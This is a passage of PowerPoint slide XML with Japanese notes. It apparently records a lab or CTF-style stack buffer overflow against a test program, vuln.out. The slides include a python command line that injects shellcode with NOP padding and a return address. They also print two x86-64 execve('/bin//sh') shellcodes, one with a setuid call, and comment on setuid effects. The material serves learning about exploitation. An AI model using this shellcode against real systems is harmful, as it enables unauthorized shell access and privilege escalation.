            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>)')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　　</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　３．</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>つ目の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を獲得するために</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を獲得する</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を送り込む</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> $(python -c 'print("shellcode" + "\x90" * Padding +</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>リターンアドレス </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>)')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　例） </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> $(python -</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900"/>
              <a:t>c 'print("\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05" + "\x90"*43 + "\x50\xe3\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\x7f")')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>★</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>最後のリターンアドレス</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>文字のところは最初は適当にいれて実行する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　その後、正しいアドレスをいれて実行すると成功する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>■参考</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>その</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を呼ぶだけのコード。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>起動後は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>ユーザとなる）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>29</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>バイト</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>その</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の中に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>命令も入れて</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>ユーザになるコード）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>45</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>バイト</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>"\x48\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\x48\x31\xc0\x66\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>\x03\x48\x8d\x40\x69\x0f\x05\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>★ポイント</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>・実行プログラム</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Owner</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の場合はソースコードに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>関数で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の権限になっておく必要がある（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>ビットを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で設定するだけでは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>獲得後の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>は変わらなかった）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>→この状態で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>BoF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>成功すると</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vulnuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>となる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>　ソースコードで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>関数を呼ばず、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を実行した場合は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>は変更できなかった。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>vuln.out</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Owner</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>とし</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>ビットを立てた状態の場合、プログラム中に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>関数を記載していなくても、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
              <a:t>を実行すると任意のユーザになることができた。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="ja-JP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63315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855</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>ワイド画面</PresentationFormat>
  <Paragraphs>68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nagoya_se</dc:creator>
  <cp:lastModifiedBy>瀬田政広</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-25T02:28:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-12T05:40:25Z</dcterms:modified>
</cp:coreProperties>
</file>